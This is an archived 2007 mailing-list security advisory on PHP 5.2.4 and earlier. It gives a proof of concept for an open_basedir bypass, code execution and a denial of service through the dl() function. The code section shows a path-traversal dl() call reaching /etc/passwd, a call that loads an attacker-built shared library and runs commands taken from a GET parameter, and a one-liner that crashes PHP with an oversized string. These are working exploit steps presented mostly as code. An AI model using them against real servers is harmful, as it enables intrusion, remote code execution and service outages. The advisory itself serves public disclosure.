PHP <=5.2.4 open_basedir bypass & code exec & denial of service

From: <laurent.gaffie(at)gmail.com>
Date: Sun Sep 09 2007 - 22:36:21 EDT

Application: PHP <=5.2.4
Web Site: http://php.net
Platform: unix
Bug: open_basedir bypass & code exec & denial of service/*some people call this as a buffer overflow , but it's a denial of service.*/ special condition: default php-memory-limit

---

1. Introduction
2. Bug
3. Proof of concept
4. Greets
5. Credits

   ---

6. Introduction

   ---

"PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML."

---

2) Bug

---

open_basedir bypass & code exec & denial of service http://ca.php.net/manual/fr/function.dl.php

---

3)Proof of concept

---

/*
debian:~# php -v
PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15) Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies */

Proof of concept example :
/*enable by default in php.ini for php 5.2.x */

<?php
dl("../../../../../../../../../../../../../../etc/passwd") output --->
Warning: dl() [function.dl]: Unable to load dynamic library './../../../../../../../../../etc/passwd' - ./../../../../../../../../../etc/passwd: invalid ELF header in /usr/local/apache2/htdocs/3.php on line 2

ya right ... /etc/passwd dont have any ELF header . but we agree that it's not checked in anyway by open_basedir. fine then bypassed .
then :
<?php
dl("./../../../../../../../../../../../home/myuser/www//my_powning_lib/pwned.so"); $a = powningfunction($_GET['lets_exec_for_fun']); print_r($a);
?>

denial of service :
debian:/home/mwoa# php -r'dl(str_repeat("0",27999991));' Erreur de segmentation
debian:/home/lorenzo#

---

4)Greets

---

Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone & #nibbles

---

5)Credits

---

laurent gaffié
laurent.gaffié@gmail.com
secorizon coming soon ! Received on Mon Sep 10 12:10:05 2007